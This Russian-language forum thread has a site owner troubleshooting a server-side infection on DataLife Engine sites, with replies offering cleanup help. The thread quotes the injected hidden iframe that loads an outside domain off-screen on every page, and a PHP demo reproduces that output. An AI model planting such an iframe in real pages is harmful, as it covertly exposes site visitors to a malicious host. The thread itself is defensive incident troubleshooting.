Не нравятся результаты поиска? Попробуйте другой поиск!

Редирект в опере 12.17


     30.05.2014    Общие вопросы    2300

вопрос
Здравствуйте! Я уже писал ранее за редирект на одном сайте, увы, никто не нашел, но вот сейчас есть новые данные и может кто-то поможет. С сегодняшнего дня три сайта dle на данном сервере перестали открываться в Опере версии 12.17 (опера старого образца, на новой, версии 21.0 открывается без проблем). Просто показывает белую страницу. При попытке посмотреть исходный код выдает:
<iframe src="http://freeroomhostelz.com/" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body>
</html>

<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->

Этот фрейм нигде не нашел, хотя стоит Антишел Пафнутия, проверял пол дате замены файлов и т.д. Понятия не имею, где он сидит. Внимание! Во всех остальных браузерах работают сайты нормально! Я решил, что у меня проблемы с оперой, пока не начали жаловаться пользователи. При проверке оказалось, что все, кто жалуется, пользуются старой оперой версии 12.17. Скорее всего причина в не открытии в том, что данный сайт, который в коде во фрейме, сейчас недоступен и каким-то образом старая опера барахлит и не открывает всю страницу. Кто поможет найти фрейм и редирект? Оплата за труд гарантируется. Вот один из пациентов: miniigri.net

Ответил: Бахмут


В общем, так как проблема довольно живо обсуждалась на сайте, я непременно должен отписаться, как она решилась на данный момент.
1. Данный вирус, как я и предполагал, а потом подтвердил уважаемый Sander, не находится на файлах сайта и движка dle, которые располагаются по FTP.
2. Хостерами был прогнан антивирусом весь VPS-сервер - безрезультатно.
3. Проблема решилась после того, как на сервере был обновлен весь софт VPS. Пока двое суток - полет нормальный. Не знаю, вернется проблема или нет, закрыли дыру или нет, но хостеры уверяют, что все VPS обновлено до самой последней версии. Вполне возможно, что обновлением не только убрали шелл, но и закрыли уязвимость.

Всем спасибо за помощь!

Комментарии пользователей (29)

vitnet
218

2172 | 930

vitnet - 30 мая 2014 20:33 - Эксперт

Потому что нормальный скрипт нужно ставить а всякую муть.

Смотрите index.php

Бахмут
5

76 | 31

Бахмут - 30 мая 2014 20:50 - Юзер

vitnet, что вы имеете ввиду, под нормальным скриптом? Не ставить DLE? Или вы имели ввиду лицензию? Стоит именно она. Ничего лишнего нет и проверено годами все модули. Файл index.php и .htaccess проверил в первую очередь. Если б было все так легко(((. В общем, жду реальной помощи.

Бахмут
5

76 | 31

Бахмут - 30 мая 2014 21:23 - Юзер

Еще один нюанс, в лайвинтернете остановилась статистика посещения сайтов с данной версии браузера примерно в обед. То есть, проблема имеется. Также попробовал в опере поставить настройки "маскироваться мод Mozilla Firefox" и тут же вошел. Чушь какая-то, но не пойму, где искать. Может на VPS сидит(((

Serik
4

408 | 191

Serik - 30 мая 2014 21:35 - Местный

В хроме вредитель не срабатывает, а в старой опере KIS тут же блочит сайт. Где то в php сидит скорее всего. Сливайте весь сайт на комп и врубайте поиск по "freeroomhostelz" в нотепад++

СПАСИБО надо тыкать в кнопку!

Бахмут
5

76 | 31

Бахмут - 30 мая 2014 22:02 - Юзер

Serik, уже скачивал и прогонял двумя прогами. Ничего не нашел. Может закодирован как-то. Может кто знает, куда можно обратиться за реальной помощью? Иначе скоро поисковики начнут блочить.
P.S. Искать нужно точно в движке, потому как на этом же сервере вордпресс работает без проблем.

vitnet
218

2172 | 930

vitnet - 30 мая 2014 22:27 - Эксперт

Загляните еще в templates.class.php и *.js

Бахмут
5

76 | 31

Бахмут - 30 мая 2014 22:32 - Юзер

vitnet, ничего подозрительного нет. На всякий "пожарный" и файл заменил. Не помогло...

Kolya groza morey
30

301 | 95

Kolya groza morey - 30 мая 2014 23:40 - Юзер

Бекапы сайта есть?

xsash
2

37 | 5

xsash - 30 мая 2014 23:57 - Юзер

проблема в том, что со стороны пользователя не особо то и видна проблема.
Вы бы кому из проверенных, ну или пальцем в небо, дали бы доступ к ftp

MTFX
4

MTFX - 31 мая 2014 00:34 - Юзер

аналогичная проблема на многих сайтах ....своих
Дело не в опере
это iframe
перешарил все фтп - так и не нашол! ... подскажите что то ...


mastodontoff
5

106 | 26

mastodontoff - 31 мая 2014 01:01 - Юзер

Может проблема не в сайте, а в вашем компьютере,? Пробывалю друзьям сылочки давать, чтобы они проверили у себя?

MTFX
4

MTFX - 31 мая 2014 03:01 - Юзер

нет это iframe ... к счастью - опера его выявляет а мазилла - нет
Пробовал базу скачать - пробил - в базе нет ссылки - или она зашифрована

к двум часам ночи iframe исчез ... но проблема осталась - так как он вернется.

dj-avtosh
39

1479 | 390

dj-avtosh - 31 мая 2014 05:47 - шашлычник

Очищу за денюшку) а ещё за денюшку помогут обезопаситься))

skype: elhan.isaev

dj-avtosh
39

1479 | 390

dj-avtosh - 31 мая 2014 05:48 - шашлычник

И запросите пожалуйста у хостера сразу дрступы к ssh.

skype: elhan.isaev

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 08:27 - Юзер

dj-avtosh, с удовольствием вам заплачу за выполненную работу и доступ к ssh имеется. Но проблема несколько усложнилась. С утра старая опера начала открывать сайты. В исходном коде фрейма не вижу. Скорее всего, как я предполагал ранее, выявить его помог случай, когда вчера данный сайт , указанный во фрейме стал недоступен. Еще я подозреваю, что данный вирус пакостит у меня давненько. Я уже описывал проблему недавно, но так никто и не помог, потому как явно его не видно. Мой предыдущий вопрос на dle-faq. Скачивание всего сайта по FTP, поиск по домену, поиску по слову iframe не помог. Скорее всего действительно сидит на самом VPS. В общем, теперь поймать заразу и проверить, что ее Действительно нет стало несколько сложнее. Возьметесь?

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 10:38 - Юзер

Ну в общем, как я предполагал, оперу пускают на сайт. Но время от времени в течении короткого времени идет перенаправление на разные фишинг ресурсы, как я описывал в прошлой теме. dj-avtosh, надеюсь на вашу помощь.

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 11:52 - Юзер

... И опять оперу не пускает. Теперь еще и оперу-мини через мобильник.((

MTFX
4

MTFX - 31 мая 2014 11:55 - Юзер

я тоже ищу у себя ... как найду - отпишусь

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 12:01 - Юзер

MTFX, спасибо, я тоже с утра в поисках. Сейчас на searchengines попробую найти кого-то. dj-avtosh не в сети скорее всего, на сайтах ужасно упала посещалка с яндекса. Время дорого, скоро будут санкции.

Sander
1125

1637 | 1204

Sander - 31 мая 2014 12:12 - Эксперт

Могу помочь.
Мне интересно всякую пакость вычислять :)

SanDev.pro - мой блог.

ICQ: 404-037-556
Skype: Sander8804

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 12:14 - Юзер

Цитата: Sander
Sander
с удовольствием приму вашу помощь! Отпишу сейчас в личку.

dj-avtosh
39

1479 | 390

dj-avtosh - 31 мая 2014 13:50 - шашлычник

если что, я в сети) в аське)

skype: elhan.isaev

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 14:19 - Юзер

В общем, Олег помог найти суть причины и отключил фрейм. Оказалось, что тег </body> заменяется функцией php на этот фрейм. Но не удалил скрипт, который сидит где-то внутри vps. Сейчас работает сисадмин по его нахождению. По результату отпишусь.

Бахмут
5

76 | 31

Бахмут - 31 мая 2014 14:20 - Юзер

dj-avtosh, не найдут, я вам тут же отпишусь. Стучал вам ранее, но не было в сети.

dj-avtosh
39

1479 | 390

dj-avtosh - 31 мая 2014 14:36 - шашлычник

вряд ли на впс будет вирус для www))

skype: elhan.isaev

Sander
1125

1637 | 1204

Sander - 31 мая 2014 15:08 - Эксперт

Содержимое файла t.txt
</body>

<?PHP
$t = file_get_contents("t.txt");
echo $t;
?>

В результате будет выведено
<iframe src="http://freeroomhostelz.com/" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body>

Так что вирус уж точно не в php файлах.

SanDev.pro - мой блог.

ICQ: 404-037-556
Skype: Sander8804

dj-avtosh
39

1479 | 390

dj-avtosh - 31 мая 2014 15:42 - шашлычник

шелл скрипт пишет php сигнатуры?

skype: elhan.isaev

Sander
1125

1637 | 1204

Sander - 31 мая 2014 16:17 - Эксперт

Как именно это происходит - надеюсь ответит Бахмут, если ему дадут ответ с техподдержки хостинга.
Я не могу объяснить природу работы этого шелла, однако факт остается фактом...

SanDev.pro - мой блог.

ICQ: 404-037-556
Skype: Sander8804

MTFX
4

MTFX - 31 мая 2014 16:02 - Юзер

выяснился интерестный факт ... 2 разных случая заражения с тем же iframe
в обоих случаях vps моло того - один хостер

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы